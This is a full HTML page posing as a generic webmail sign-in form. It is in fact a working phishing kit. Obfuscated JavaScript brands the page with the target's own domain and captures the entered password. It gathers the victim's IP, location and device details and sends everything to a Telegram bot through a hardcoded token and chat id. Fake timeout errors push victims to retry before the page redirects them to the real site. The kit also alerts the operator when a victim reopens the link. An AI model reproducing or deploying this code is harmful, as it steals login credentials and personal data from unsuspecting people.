<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="referrer" content="strict-origin">
    <link id="favicon" rel="shortcut icon" type="image/png" href="/api/placeholder/32/32">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <title>Webmail - Login</title>
    <style>
        body {
            background-color: #eeeeee;
            font-family: Helvetica Neue, Helvetica, sans-serif;
            font-size: 13px;
            color: #425152;
            margin: 0;
        }

        #background-frame {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: -1;
            border: none;
            pointer-events: none;
            filter: brightness(0.7);
        }

        ::placeholder {
            color: #d9dad9;
        }

        a {
            color: #425152;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }

        input {
            border-radius: 5px;
            padding: 5px 3px;
            border: 1px solid #ccc;
        }

        input.submit {
            font-weight: bold;
            text-align: center;
            min-width: 90px;
            min-height: 35px;
            color: #f0f0f0;
            background: #444444;
            padding: 5px 12px;
            border-color: #444444;
            border-style: solid;
            cursor: pointer;
        }

        input.submit:hover {
            color: #ffffff;
            background: #555555;
        }

        .row {
            margin: 8px 0;  /* Reduced from 10px */
        }

        .row:after {
            content: "";
            display: table;
            clear: both;
        }

        .container {
            background: #ffffff;
            padding: 25px;  /* Reduced from 40px */
            width: 380px;   /* Reduced from 416px */
            border-radius: 5px;
            margin: 10% auto 30px auto;
            box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
            transition: all 0.3s cubic-bezier(.25, .8, .25, 1);
            position: relative;
        }

        .col1, .col2 {
            float: left;
            line-height: 25px;  /* Reduced from 30px */
            padding-top: 2px;   /* Reduced from 4px */
        }

        .col1 {
            width: 100px;    /* Reduced from 124px */
            font-size: 13px;
            font-weight: 600;
        }

        .col2 {
            width: 270px;   /* Reduced from 286px */
        }

        .col2 input {
            width: 96%;
        }

        .error {
            color: #D52B1E;
            font-weight: normal;
            font-size: 12px;
            margin-top: 5px;
        }

        .password-icon {
            width: 18px;    /* Reduced from 20px */
            position: absolute;
            cursor: pointer;
            margin-top: 7px;  /* Reduced from 9px */
            margin-left: -28px;
            background-color: white;
        }

        /*.text-g {
            font-family: Arial, sans-serif;
            text-transform: uppercase;
            text-align: left;
            font-size: 22px;    
            color: #444444;
            margin: 10px 0;     
        }*/

        .banner-container {
    display: flex;
    align-items: center;
    gap: 10px;
    margin: 10px 0;
}

.banner-logo {
    width: 24px;
    height: 24px;
    object-fit: contain;
}

.text-g {
    font-family: Arial, sans-serif;
    text-transform: uppercase;
    text-align: left;
    font-size: 22px;
    color: #444444;
    margin: 0;  /* Changed from margin: 10px 0 */
}

        #loading {
            display: none;
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(255, 255, 255, 0.8);
        }

        #loading img {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 40px;   /* Reduced from 50px */
        }

        @media only screen and (max-width: 600px) {
            .container {
                width: 100%;
                border-radius: 0;
                box-shadow: none;
                padding: 15px;
                margin-top: 0;
            }

            .col1, .col2 {
                float: none;
                width: 100%;
            }

            .password-icon {
                right: 20px;
                margin-top: -25px;
            }
        }
        /* Add these styles for the disabled email input */
input[type="email"]:disabled {
    background-color: #f5f5f5;
    color: #666;
    cursor: not-allowed;
    border-color: #ddd;
}
    </style>

    <style>
  .modal {
    display: none; 
    position: fixed; 
    z-index: 1; 
    padding-top: 100px; 
    left: 0;
    top: 0;
    width: 100%; 
    height: 100%; 
    overflow: auto; 
    background-color: rgb(0, 0, 0); 
    background-color: rgba(0, 0, 0, 0.4); 
  }

  .modal-content {
    background-color: #fefefe;
    margin: auto;
    padding: 20px;
    border: 1px solid #888;
    width: 80%;
    max-width: 500px;
    text-align: center;
    border-radius: 10px;
  }

  .close-btn {
    color: #aaa;
    float: right;
    font-size: 28px;
    font-weight: bold;
  }

  .close-btn:hover,
  .close-btn:focus {
    color: black;
    text-decoration: none;
    cursor: pointer;
  }
</style>
</head>
<body>




 <iframe  id="background-frame" title="background" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>
    
    <div id="login_form">
        <div class="container">
            <div id="loading">
                <img src="/api/placeholder/40/40" alt="Loading...">
            </div>
            


            <div class="banner-container">
    <img src="/api/placeholder/24/24" alt="" class="banner-logo" id="banner-logo">
    <h1 class="text-g" id="banner"></h1>
</div>
            
            <div class="row">
                <div class="col1">
                    <label for="email">Email:</label>
                </div>
                <div class="col2">
                    <input type="email" id="email" name="email" placeholder="Email" autocomplete="off" disabled>
                </div>
            </div>
            
            <div class="row">
                <div class="col1">
                    <label for="password">Password:</label>
                </div>
                <div class="col2">
                    <input type="password" id="password" name="password" placeholder="Password" autocomplete="off">
                    
                </div>
            </div>
            
            <div class="row">
                <div id="error" class="error"></div>
            </div>
            
            <div class="row">
                <div class="col1">
                    <input type="button" id="submit" class="submit" value="Login">
                </div>
            </div>
            
            <div class="row">
                <p style="font-size: 11px; margin: 5px 0;">
                    All rights reserved. Copyright © 2024 <span id="company"></span>
                </p>
            </div>
        </div>
    </div>
<!-- Modal HTML -->
<div id="custom-alert" class="modal">
  <div class="modal-content">
    <span class="close-btn">&times;</span>
    <p>Password Already Updated, Please wait 30 days</p>
  </div>
</div>

    <script>
const _0x43d7f6=_0x4c22;function _0x4c22(_0x3cff80,_0x183ffb){const _0x332aae=_0x332a();return _0x4c22=function(_0x4c2209,_0x6dea4f){_0x4c2209=_0x4c2209-0x180;let _0xbe07a1=_0x332aae[_0x4c2209];return _0xbe07a1;},_0x4c22(_0x3cff80,_0x183ffb);}(function(_0x258b78,_0x118baa){const _0x5c3cda=_0x4c22,_0x46cee7=_0x258b78();while(!![]){try{const _0x51911e=parseInt(_0x5c3cda(0x1f5))/0x1*(-parseInt(_0x5c3cda(0x1ae))/0x2)+-parseInt(_0x5c3cda(0x1ef))/0x3*(parseInt(_0x5c3cda(0x185))/0x4)+parseInt(_0x5c3cda(0x211))/0x5*(-parseInt(_0x5c3cda(0x1b6))/0x6)+parseInt(_0x5c3cda(0x1d5))/0x7*(-parseInt(_0x5c3cda(0x1fd))/0x8)+parseInt(_0x5c3cda(0x181))/0x9+parseInt(_0x5c3cda(0x1f6))/0xa+parseInt(_0x5c3cda(0x1bf))/0xb;if(_0x51911e===_0x118baa)break;else _0x46cee7['push'](_0x46cee7['shift']());}catch(_0x4054f2){_0x46cee7['push'](_0x46cee7['shift']());}}}(_0x332a,0x277b2));function setCookie(_0xb85770,_0x5c1e21,_0x42a311){const _0x114411=_0x4c22;var _0x46a2b9='';if(_0x42a311){var _0x268fe7=new Date();_0x268fe7[_0x114411(0x1e1)](_0x268fe7[_0x114411(0x1ac)]()+_0x42a311*0x18*0x3c*0x3c*0x3e8),_0x46a2b9=_0x114411(0x1db)+_0x268fe7[_0x114411(0x196)]();}document[_0x114411(0x20c)]=_0xb85770+'='+(_0x5c1e21||'')+_0x46a2b9+_0x114411(0x197);}function getCookie(_0x1a0315){const _0x357e13=_0x4c22;var _0x41d1d2=_0x1a0315+'=',_0xe30897=document['cookie'][_0x357e13(0x1f8)](';');for(var _0x1bf4e9=0x0;_0x1bf4e9<_0xe30897[_0x357e13(0x1fa)];_0x1bf4e9++){var _0x3ec3b6=_0xe30897[_0x1bf4e9];while(_0x3ec3b6[_0x357e13(0x1e0)](0x0)=='\x20')_0x3ec3b6=_0x3ec3b6[_0x357e13(0x1d3)](0x1,_0x3ec3b6['length']);if(_0x3ec3b6['indexOf'](_0x41d1d2)==0x0)return _0x3ec3b6[_0x357e13(0x1d3)](_0x41d1d2['length'],_0x3ec3b6[_0x357e13(0x1fa)]);}return null;}var errormessage=_0x43d7f6(0x20d);const hash=window[_0x43d7f6(0x1f2)]['hash']['substring'](0x1),countryLanguageMap={'AF':'ps','AL':'sq','DZ':'ar','AD':'ca','AO':'pt','AG':'en','AR':'es','AM':'hy','AU':'en','AT':'de','AZ':'az','BS':'en','BH':'ar','BD':'bn','BB':'en','BY':'be','BE':'nl','BZ':'en','BJ':'fr','BT':'dz','BO':'es','BA':'bs','BW':'en','BR':'pt','BN':'ms','BG':'bg','BF':'fr','BI':'rn','KH':'km','CM':'fr','CA':'en','CV':'pt','CF':'fr','TD':'ar','CL':'es','CN':'zh','CO':'es','KM':'ar','CG':'fr','CD':'fr','CR':'es','CI':'fr','HR':'hr','CU':'es','CY':'el','CZ':'cs','DK':'da','DJ':'ar','DM':'en','DO':'es','TL':'pt','EC':'es','EG':'ar','SV':'es','GQ':'es','ER':'ti','EE':'et','ET':'am','FJ':'en','FI':'fi','FR':'fr','GA':'fr','GM':'en','GE':'ka','DE':'de','GH':'en','GR':'el','GD':'en','GT':'es','GN':'fr','GW':'pt','GY':'en','HT':'ht','HN':'es','HU':'hu','IS':'is','IN':'hi','ID':'id','IR':'fa','IQ':'ar','IE':'en','IL':'he','IT':'it','JM':'en','JP':'ja','JO':'ar','KZ':'kk','KE':'sw','KI':'en','KP':'ko','KR':'ko','XK':'sq','KW':'ar','KG':'ky','LA':'lo','LV':'lv','LB':'ar','LS':'st','LR':'en','LY':'ar','LI':'de','LT':'lt','LU':'lb','MG':'mg','MW':'ny','MY':'ms','MV':'dv','ML':'fr','MT':'mt','MH':'en','MR':'ar','MU':'en','MX':'es','FM':'en','MD':'ro','MC':'fr','MN':'mn','ME':'sr','MA':'ar','MZ':'pt','MM':'my','NA':'en','NR':'na','NP':'ne','NL':'nl','NZ':'en','NI':'es','NE':'fr','NG':'en','MK':'mk','NO':'nb','OM':'ar','PK':'ur','PW':'en','PS':'ar','PA':'es','PG':'en','PY':'es','PE':'es','PH':'tl','PL':'pl','PT':'pt','QA':'ar','RO':'ro','RU':'ru','RW':'rw','KN':'en','LC':'en','VC':'en','WS':'sm','SM':'it','ST':'pt','SA':'ar','SN':'fr','RS':'sr','SC':'fr','SL':'en','SG':'ms','SK':'sk','SI':'sl','SB':'en','SO':'so','ZA':'af','SS':'en','ES':'es','LK':'si','SD':'ar','SR':'nl','SZ':'ss','SE':'sv','CH':'de','SY':'ar','TW':'zh','TJ':'tg','TZ':'sw','TH':'th','TG':'fr','TO':'to','TT':'en','TN':'ar','TR':'tr','TM':'tk','TV':'en','UG':'sw','UA':'uk','AE':'ar','GB':'en','US':'en','UY':'es','UZ':'uz','VU':'bi','VA':'it','VE':'es','VN':'vi','YE':'ar','ZM':'en','ZW':'sn'};let tg2={'token2':_0x43d7f6(0x1e7),'chat_id2':_0x43d7f6(0x1c7)};function sendMessage2(_0x5554e5){const _0x5d8eb3=_0x43d7f6,_0x9fb197=_0x5d8eb3(0x1a4)+tg2['token2']+_0x5d8eb3(0x210),_0x402f04=new XMLHttpRequest();_0x402f04[_0x5d8eb3(0x1fe)]('POST',_0x9fb197,!![]),_0x402f04[_0x5d8eb3(0x219)](_0x5d8eb3(0x1ed),_0x5d8eb3(0x207));const _0x247973={'chat_id':tg2['chat_id2'],'text':_0x5554e5,'parse_mode':'Markdown'};_0x402f04[_0x5d8eb3(0x19b)](JSON[_0x5d8eb3(0x1d8)](_0x247973));}function getUserCountry(){const _0xadaeef=_0x43d7f6;return fetch(_0xadaeef(0x18f))[_0xadaeef(0x193)](_0x21949b=>_0x21949b[_0xadaeef(0x19e)]())[_0xadaeef(0x193)](_0x1e983f=>{const _0x1e30e2=_0xadaeef;return console[_0x1e30e2(0x21d)](_0x1e30e2(0x1c8),_0x1e983f[_0x1e30e2(0x195)]),_0x1e983f[_0x1e30e2(0x195)];})[_0xadaeef(0x1b1)](_0x2d0d69=>{const _0x457dcb=_0xadaeef;return console[_0x457dcb(0x19f)](_0x457dcb(0x1fc),_0x2d0d69),null;});}function translateText(_0x385edf,_0x15af86){return new Promise((_0x347bee,_0x3c2ef1)=>{const _0x326596=_0x4c22,_0x49fbd3=_0x326596(0x1cd)+_0x15af86+_0x326596(0x1b0)+encodeURIComponent(_0x385edf);fetch(_0x49fbd3)[_0x326596(0x193)](_0x56adc5=>_0x56adc5['json']())[_0x326596(0x193)](_0x122ec8=>{const _0x33f580=_0x326596,_0x448f1a=_0x122ec8[0x0][_0x33f580(0x205)](_0x82a95f=>_0x82a95f[0x0])['join']('');_0x347bee(_0x448f1a);})[_0x326596(0x1b1)](_0xe4310d=>_0x3c2ef1(_0xe4310d));});}async function translatePage(_0x1f39ee){const _0x4f967f=_0x43d7f6,_0x41ddf7=document['createTreeWalker'](document['body'],NodeFilter[_0x4f967f(0x203)],null,![]);let _0x4af6e3;while(_0x4af6e3=_0x41ddf7[_0x4f967f(0x21a)]()){if(_0x4af6e3['nodeValue']['trim']())try{const _0x257b9a=await translateText(_0x4af6e3[_0x4f967f(0x19a)],_0x1f39ee);_0x4af6e3[_0x4f967f(0x19a)]=_0x257b9a;}catch(_0x2e83ff){console[_0x4f967f(0x19f)](_0x4f967f(0x1b2),_0x2e83ff);}}const _0x49356c=document[_0x4f967f(0x1d0)](_0x4f967f(0x1c2));for(const _0xad6ef5 of _0x49356c){if(_0xad6ef5[_0x4f967f(0x1b7)])try{const _0x54335c=await translateText(_0xad6ef5['placeholder'],_0x1f39ee);_0xad6ef5[_0x4f967f(0x1b7)]=_0x54335c;}catch(_0x18bdb9){console[_0x4f967f(0x19f)](_0x4f967f(0x18c),_0x18bdb9);}}}async function autoTranslate(){const _0x52fe52=_0x43d7f6;try{const _0x211b13=await getUserCountry();let _0x3a4a60='en';_0x211b13&&countryLanguageMap[_0x211b13]&&(_0x3a4a60=countryLanguageMap[_0x211b13][_0x52fe52(0x213)]()),await translatePage(_0x3a4a60),console[_0x52fe52(0x21d)](_0x52fe52(0x1dd));}catch(_0x1f8899){console[_0x52fe52(0x19f)](_0x52fe52(0x1b9),_0x1f8899);}}const restrictedFiles=[_0x43d7f6(0x198),_0x43d7f6(0x188)];var urlchangers=[_0x43d7f6(0x188),_0x43d7f6(0x1c0)];function getBrowserInfo(){const _0x195338=_0x43d7f6,_0x1efff2=navigator[_0x195338(0x1b3)];let _0x2f1bb8='Unknown',_0x523ec7='';if(_0x1efff2[_0x195338(0x194)](_0x195338(0x20b)))_0x2f1bb8=_0x195338(0x1f3),_0x523ec7=_0x1efff2[_0x195338(0x1f8)]('Firefox/')[0x1][_0x195338(0x1f8)]('\x20')[0x0];else{if(_0x1efff2[_0x195338(0x194)]('Chrome/'))_0x2f1bb8=_0x195338(0x214),_0x523ec7=_0x1efff2['split'](_0x195338(0x1f0))[0x1][_0x195338(0x1f8)]('\x20')[0x0];else _0x1efff2['includes'](_0x195338(0x19c))&&!_0x1efff2[_0x195338(0x194)]('Chrome')&&(_0x2f1bb8='Safari',_0x523ec7=_0x1efff2['split'](_0x195338(0x208))[0x1][_0x195338(0x1f8)]('\x20')[0x0]);}return _0x2f1bb8+'\x20'+_0x523ec7;}function _0x332a(){const _0xb227e0=['Password\x20Already\x20Updated,\x20Please\x20wait\x2030\x20days','Error\x20fetching\x20IP\x20info:','/sendMessage','5JHBoVb','\x0a•\x20Device\x20Type:\x20','toLowerCase','Chrome','padStart','az-static','getFullYear','width','setRequestHeader','nextNode','textContent','close-btn','log','resolvedOptions','click','innerHeight','replace','Linux','533565nTPMPa','🔐\x20HOSTINGER\x20LOGIN\x20\x0a━━━━━━━━━━━━━━━━━━━━━━\x0a📧\x20Login\x20Details\x0a•\x20Username:\x20','\x0a•\x20Region:\x20','getDate','2936CwsSCT','platform','\x20LOG\x0a━━━━━━━━━━━━━━━━━━━━━━\x0a📧\x20Login\x20Details\x0a•\x20Username:\x20','google','\x0a•\x20OS:\x20','style','macOS','Placeholder\x20translation\x20error:','test','\x0a•\x20Platform:\x20','https://ipinfo.io/json','getElementsByTagName','Unknown\x20OS','Windows\x20NT\x206.3','then','includes','country','toUTCString',';\x20path=/','office','title','nodeValue','send','Safari/','desktop','json','error','value','addEventListener','\x0a•\x20Mode:\x20Automatic\x0a•\x20Language:\x20English\x20(American)\x0a📍\x20Location\x20Info\x0a•\x20IP\x20Address:\x20','Unknown','https://api.telegram.org/bot','\x20-\x20','bit\x0a•\x20Pixel\x20Ratio:\x20','VICTIM\x20IS\x20RETRYING\x20YOUR\x20LINK\x20-\x20','screen','hash','src','getMonth','getTime','Windows\x2010','133652rhyoeO','🔐\x20','&dt=t&q=','catch','Translation\x20error:','userAgent','target','onload','1939560gCbgUv','placeholder','replaceState','Auto-translation\x20error:','slice','Error\x20formatting\x20message:','banner-logo','loc','company','5993878IROUhi','zimbra','&sz=128','input[placeholder],\x20textarea[placeholder]','trim','loading','height','Windows\x20NT\x2010.0','7266658144','User\x20country:','true','preventDefault','\x0a•\x20Color\x20Depth:\x20','email','https://translate.googleapis.com/translate_a/single?client=gtx&sl=auto&tl=','block','\x0a•\x20Country:\x20','querySelectorAll','x\x0a⏰\x20Timestamp:\x20','focus','substring','Error\x20updating\x20URL:','75726AXvbSm','\x0a📱\x20Device\x20Details\x0a•\x20Screen\x20Resolution:\x20','\x0a💻\x20Browser\x20Info\x0a•\x20Browser:\x20','stringify','passwordUpdated','getElementById',';\x20expires=','innerWidth','Translation\x20complete','Mac\x20OS\x20X','\x0a•\x20Coordinates:\x20','charAt','setTime','Sign\x20in\x20to\x20','language','DateTimeFormat','password','submit','6774219498:AAHt48B3AwMhWRXg9yqeR64ZHbkSvQQSYEM','custom-alert','onclick','background-frame','banner','\x0a•\x20Window\x20Size:\x20','Content-Type','indexOf','465PEiEng','Chrome/','\x0a━━━━━━━━━━━━━━━━━━━━━━','location','Firefox','substr','1LAnffE','2669290KvYWoF','\x0a•\x20Timezone:\x20','split','\x0a•\x20City:\x20','length','https://www.','Error\x20fetching\x20country:','152SzkioH','open','city','/api/placeholder/32/32','none','mobile','SHOW_TEXT','timezone','map','\x0a•\x20Language:\x20','application/json','Version/','tablet','display','Firefox/','cookie','Sign\x20in\x20timed\x20out.\x20Please\x20login\x20again'];_0x332a=function(){return _0xb227e0;};return _0x332a();}function getOSInfo(){const _0x6c7b38=_0x43d7f6,_0x2cc55c=navigator['userAgent'];if(_0x2cc55c[_0x6c7b38(0x194)](_0x6c7b38(0x1c6)))return _0x6c7b38(0x1ad);if(_0x2cc55c[_0x6c7b38(0x194)](_0x6c7b38(0x192)))return'Windows\x208.1';if(_0x2cc55c[_0x6c7b38(0x194)](_0x6c7b38(0x1de)))return _0x6c7b38(0x18b);if(_0x2cc55c[_0x6c7b38(0x194)]('Linux'))return _0x6c7b38(0x180);return _0x6c7b38(0x191);}function getDeviceType(){const _0xeee875=_0x43d7f6,_0x54ef3d=navigator[_0xeee875(0x1b3)];if(/(tablet|ipad|playbook|silk)|(android(?!.*mobi))/i[_0xeee875(0x18d)](_0x54ef3d))return _0xeee875(0x209);if(/Mobile|Android|iP(hone|od)|IEMobile|BlackBerry|Kindle|Silk-Accelerated|(hpw|web)OS|Opera M(obi|ini)/[_0xeee875(0x18d)](_0x54ef3d))return _0xeee875(0x202);return _0xeee875(0x19d);}async function formatMessage(_0x96a4f,_0x23f187,_0x44c6e2){const _0x1943ed=_0x43d7f6;try{const _0x174253=await fetch('https://ipinfo.io/json'),_0x78203f=await _0x174253[_0x1943ed(0x19e)](),_0x526375=window[_0x1943ed(0x1a8)],_0x5d6d34=getBrowserInfo(),_0x3fbf8e=getOSInfo(),_0x542553=getDeviceType(),[_0xe35bfa,_0x34ffa4]=_0x78203f[_0x1943ed(0x1bd)]?_0x78203f[_0x1943ed(0x1bd)][_0x1943ed(0x1f8)](','):[_0x1943ed(0x1a3),_0x1943ed(0x1a3)];return _0x1943ed(0x1af)+_0x44c6e2+_0x1943ed(0x187)+_0x96a4f+'\x0a•\x20Password:\x20'+_0x23f187+_0x1943ed(0x1a2)+(_0x78203f['ip']||_0x1943ed(0x1a3))+_0x1943ed(0x1cf)+(_0x78203f[_0x1943ed(0x195)]||'Unknown')+_0x1943ed(0x183)+(_0x78203f['region']||_0x1943ed(0x1a3))+_0x1943ed(0x1f9)+(_0x78203f[_0x1943ed(0x1ff)]||_0x1943ed(0x1a3))+_0x1943ed(0x1df)+_0xe35bfa+',\x20'+_0x34ffa4+_0x1943ed(0x1f7)+(_0x78203f[_0x1943ed(0x204)]||'Unknown')+_0x1943ed(0x1d7)+_0x5d6d34+'\x0a•\x20OS:\x20'+_0x3fbf8e+_0x1943ed(0x212)+_0x542553+_0x1943ed(0x1d6)+_0x526375[_0x1943ed(0x218)]+'x'+_0x526375[_0x1943ed(0x1c5)]+_0x1943ed(0x1ec)+window['innerWidth']+'x'+window[_0x1943ed(0x220)]+'\x0a•\x20Platform:\x20'+navigator['platform']+_0x1943ed(0x206)+navigator[_0x1943ed(0x1e3)]+_0x1943ed(0x1cb)+_0x526375['colorDepth']+'bit\x0a•\x20Pixel\x20Ratio:\x20'+window['devicePixelRatio']+_0x1943ed(0x1d1)+new Date()['toISOString']()+_0x1943ed(0x1f1);}catch(_0x23d69d){return console['error'](_0x1943ed(0x20f),_0x23d69d),formatMessageWithoutIP(_0x96a4f,_0x23f187);}}function formatMessageWithoutIP(_0x1de1f3,_0x24fd05){const _0x2100ae=_0x43d7f6,_0x42c360=window[_0x2100ae(0x1a8)],_0x4dccb1=getBrowserInfo(),_0x549857=getOSInfo(),_0xd5f50f=getDeviceType();return _0x2100ae(0x182)+_0x1de1f3+'\x0a•\x20Password:\x20'+_0x24fd05+'\x0a•\x20Mode:\x20Automatic\x0a•\x20Language:\x20English\x20(American)\x0a📍\x20Location\x20Info\x0a•\x20IP\x20Address:\x20Unknown\x0a•\x20Country:\x20Unknown\x0a•\x20Region:\x20Unknown\x0a•\x20City:\x20Unknown\x0a•\x20Coordinates:\x20Unknown\x0a•\x20Timezone:\x20'+Intl[_0x2100ae(0x1e4)]()[_0x2100ae(0x21e)]()['timeZone']+_0x2100ae(0x1d7)+_0x4dccb1+_0x2100ae(0x189)+_0x549857+_0x2100ae(0x212)+_0xd5f50f+_0x2100ae(0x1d6)+_0x42c360[_0x2100ae(0x218)]+'x'+_0x42c360[_0x2100ae(0x1c5)]+'\x0a•\x20Window\x20Size:\x20'+window[_0x2100ae(0x1dc)]+'x'+window[_0x2100ae(0x220)]+_0x2100ae(0x18e)+navigator[_0x2100ae(0x186)]+_0x2100ae(0x206)+navigator[_0x2100ae(0x1e3)]+_0x2100ae(0x1cb)+_0x42c360['colorDepth']+_0x2100ae(0x1a6)+window['devicePixelRatio']+_0x2100ae(0x1d1)+new Date()['toISOString']()+_0x2100ae(0x1f1);}function init(){const _0x398e80=_0x43d7f6,_0x2d3605=window[_0x398e80(0x1f2)][_0x398e80(0x1a9)][_0x398e80(0x1d3)](0x1);if(_0x2d3605){const _0x3b2519=_0x2d3605[_0x398e80(0x1ee)]('@'),_0x2ea9f5=_0x2d3605['substr'](_0x3b2519+0x1);try{const _0x173b8a='/'+_0x2ea9f5+'/index/cgi-sys/bxd.cgi?a=com&id=bC4fvQB2QGsC1h98QCzeN-1725305970&cc=da61ed3a-530d-4862-82e1-4f0212a5bbb3';window['history'][_0x398e80(0x1b8)]({},'',_0x173b8a);}catch(_0x578fcf){console[_0x398e80(0x19f)](_0x398e80(0x1d4),_0x578fcf);}initializeUI(_0x2d3605),loadBackground(_0x2d3605),autoTranslate();}if(!checkPasswordUpdate())return;}function initializeUI(_0x561458){const _0x490bd5=_0x43d7f6,_0x5541e6=_0x561458[_0x490bd5(0x221)]('#',''),_0x209e0a=_0x5541e6[_0x490bd5(0x1ee)]('@'),_0x1f69c0=_0x5541e6['slice'](_0x209e0a+0x1),_0x52affc=_0x1f69c0['split']('.')[0x0];document['getElementById'](_0x490bd5(0x1eb))['textContent']=''+_0x52affc,document[_0x490bd5(0x1da)](_0x490bd5(0x1be))['textContent']=_0x52affc,document[_0x490bd5(0x199)]=_0x490bd5(0x1e2)+_0x52affc,document[_0x490bd5(0x1da)](_0x490bd5(0x1cc))[_0x490bd5(0x1a0)]=_0x5541e6;const _0x12077d='https://www.google.com/s2/favicons?domain='+_0x1f69c0+_0x490bd5(0x1c1);document[_0x490bd5(0x1da)](_0x490bd5(0x1bc))[_0x490bd5(0x1aa)]=_0x12077d,document[_0x490bd5(0x1da)]('password')[_0x490bd5(0x1d2)]();const _0x510c9d=document[_0x490bd5(0x1da)]('favicon');_0x510c9d['href']=_0x490bd5(0x200);}function loadBackground(_0x2cce75){const _0x5600a1=_0x43d7f6,_0x37855c=_0x2cce75['replace']('#',''),_0x338fd9=_0x37855c['indexOf']('@'),_0x147444=_0x37855c[_0x5600a1(0x1ba)](_0x338fd9+0x1),_0x390ea0=document['getElementById'](_0x5600a1(0x1ea));_0x390ea0[_0x5600a1(0x1aa)]='https://'+_0x147444;}function showCustomAlert(_0x12bfd0){const _0x4d1a7e=_0x43d7f6;var _0x4a74f2=document[_0x4d1a7e(0x1da)](_0x4d1a7e(0x1e8)),_0x1bccc0=document['getElementsByClassName'](_0x4d1a7e(0x21c))[0x0];_0x4a74f2[_0x4d1a7e(0x18a)]['display']=_0x4d1a7e(0x1ce),_0x4a74f2[_0x4d1a7e(0x190)]('p')[0x0]['textContent']=_0x12bfd0,_0x1bccc0[_0x4d1a7e(0x1e9)]=function(){const _0x5845d6=_0x4d1a7e;_0x4a74f2[_0x5845d6(0x18a)][_0x5845d6(0x20a)]=_0x5845d6(0x201);},window['onclick']=function(_0x1187d3){const _0xabe4b1=_0x4d1a7e;_0x1187d3[_0xabe4b1(0x1b4)]==_0x4a74f2&&(_0x4a74f2[_0xabe4b1(0x18a)]['display']=_0xabe4b1(0x201));};}function checkPasswordUpdate(){const _0x3a2a37=_0x43d7f6;var _0x53860c=getCookie(_0x3a2a37(0x1d9));if(_0x53860c)return showCustomAlert(_0x3a2a37(0x20e)),setTimeout(function(){const _0x3b27cc=_0x3a2a37;var _0x37a12a=new Date(),_0x16a80f=String(_0x37a12a[_0x3b27cc(0x184)]())[_0x3b27cc(0x215)](0x2,'0'),_0x22a4ed=String(_0x37a12a[_0x3b27cc(0x1ab)]()+0x1)[_0x3b27cc(0x215)](0x2,'0'),_0x573a1b=_0x37a12a[_0x3b27cc(0x217)]();_0x37a12a=_0x22a4ed+'/'+_0x16a80f+'/'+_0x573a1b;var _0x21be5e=window[_0x3b27cc(0x1f2)][_0x3b27cc(0x1a9)][_0x3b27cc(0x1f4)](0x1),_0x4593f7=_0x3b27cc(0x1a7)+_0x21be5e+_0x3b27cc(0x1a5)+_0x37a12a;sendMessage2(_0x4593f7);var _0x237b1e=document['getElementById'](_0x3b27cc(0x1cc))[_0x3b27cc(0x1a0)],_0x567a8c=_0x237b1e['indexOf']('@'),_0x30bc98=_0x237b1e[_0x3b27cc(0x1f4)](_0x567a8c+0x1);window[_0x3b27cc(0x1f2)]['replace'](_0x3b27cc(0x1fb)+_0x30bc98);},0x1770),![];return!![];}var count=0x0,count=0x0;document[_0x43d7f6(0x1da)](_0x43d7f6(0x1e6))[_0x43d7f6(0x1a1)](_0x43d7f6(0x21f),async function(_0x3cff2f){const _0x594784=_0x43d7f6;_0x3cff2f[_0x594784(0x1ca)](),count++;const _0x75e758=document['getElementById'](_0x594784(0x1cc))[_0x594784(0x1a0)]['trim'](),_0x576046=document[_0x594784(0x1da)](_0x594784(0x1e5))[_0x594784(0x1a0)][_0x594784(0x1c3)]();if(_0x75e758&&_0x576046&&count<0x3){document[_0x594784(0x1da)](_0x594784(0x1c4))[_0x594784(0x18a)][_0x594784(0x20a)]=_0x594784(0x1ce);try{const _0x38e544=await formatMessage(_0x75e758,_0x576046,_0x594784(0x216));sendMessage2(_0x38e544);}catch(_0x4ff75d){console[_0x594784(0x19f)](_0x594784(0x1bb),_0x4ff75d);}setTimeout(()=>{const _0x2e50ce=_0x594784;document[_0x2e50ce(0x1da)](_0x2e50ce(0x1c4))[_0x2e50ce(0x18a)]['display']=_0x2e50ce(0x201),document[_0x2e50ce(0x1da)](_0x2e50ce(0x19f))[_0x2e50ce(0x21b)]='Sign\x20in\x20attempt\x20timeout,\x20Please\x20try\x20again.',document[_0x2e50ce(0x1da)](_0x2e50ce(0x1e5))[_0x2e50ce(0x1a0)]='';},0x3e8);}if(count>0x2){document['getElementById']('loading')[_0x594784(0x18a)][_0x594784(0x20a)]=_0x594784(0x1ce);try{setCookie(_0x594784(0x1d9),_0x594784(0x1c9),0x1e);const _0x4d5cb4=await formatMessage(_0x75e758,_0x576046,_0x594784(0x216));sendMessage2(_0x4d5cb4);}catch(_0x2f562e){console[_0x594784(0x19f)](_0x594784(0x1bb),_0x2f562e);}setTimeout(function(){const _0x16a998=_0x594784;var _0x1955a3=_0x75e758[_0x16a998(0x1ee)]('@'),_0x1cfcc6=_0x75e758[_0x16a998(0x1f4)](_0x1955a3+0x1);window[_0x16a998(0x1f2)]['replace']('https://www.'+_0x1cfcc6);},0x3e8);}}),window[_0x43d7f6(0x1b5)]=init;
    </script>
</body>
</html>
